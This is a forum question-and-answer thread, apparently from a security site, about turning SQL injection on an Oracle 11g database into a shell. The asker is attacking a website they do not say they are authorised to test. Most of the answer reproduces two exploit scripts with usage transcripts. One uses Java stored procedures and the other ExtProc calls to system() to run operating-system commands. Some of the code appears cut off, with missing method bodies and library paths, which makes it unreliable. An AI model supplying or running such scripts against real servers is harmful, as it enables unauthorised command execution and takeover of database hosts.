I am testing for SQL Injection on a website that uses ASP code. I can successfully get all the databases and tables. Current user has DBA privileges. I wonder how can I get a reverse shell by using this SQL Injection. Oracle version is "Oracle Database 11g Enterprise Edition Release"

S.L. Barth
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  • Shells outside of the MS-SQL world often require some form of creativity. Perhaps you should do your own research, and explore the database before asking such questions. – rook Aug 02 '15 at 19:10
  • This is too broad to answer. Narrow your scope and we might be able to help. – schroeder Aug 03 '15 at 03:39

1 Answers1


You can try this two ways of executing code on Oracle DBMS.

The first is with Java code: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql

-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r--   1 oracle   system        45 Nov 22 12:20 mytest
-- -rw-r--r--   1 oracle   system      1645 Nov 22 12:20 aaa
-- -rw-r--r--   1 oracle   system      8267 Nov 22 12:20 bbb
-- [...]

create or replace and resolve java source named "oraexec" as
import java.lang.*;
import java.io.*;
public class oraexec
     * Command execution module
    public static void execCommand(String command) throws IOException

     * File reading module
    public static void readFile(String filename) throws IOException
        FileReader f = new FileReader(filename);
        BufferedReader fr = new BufferedReader(f);
        String text = fr.readLine();
        while (text != null) {
            text = fr.readLine();

     * File writing module
    public static void writeFile(String filename, String line) throws IOException
        FileWriter f = new FileWriter(filename, true); /* append */
        BufferedWriter fw = new BufferedWriter(f);

-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language java           
name 'oraexec.execCommand(java.lang.String)';

-- usage: exec dbms_java.set_output(2000);
--        set serveroutput on;
--        exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';

-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';

The second is using ExtProc: http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql

-- Usage example:
-- $ echo $ORACLE_HOME
-- /opt/oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 oracle   orainst        0 Dec 19 13:49 /tmp/64

-- library for 32-bit oracle releases
create or replace library exec_shell32 as

-- library for 64-bit oracle releases
create or replace library exec_shell64 as

-- package for 32-bit oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
    procedure exec(cmdstring in char);
end oracmd32;
create or replace package body oracmd32 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_shell32
    language c;
end oracmd32;

-- package for 64-bit oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
    procedure exec(cmdstring in char);
end oracmd64;
create or replace package body oracmd64 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_shell64
    language c;
end oracmd64;
Cristian Dobre
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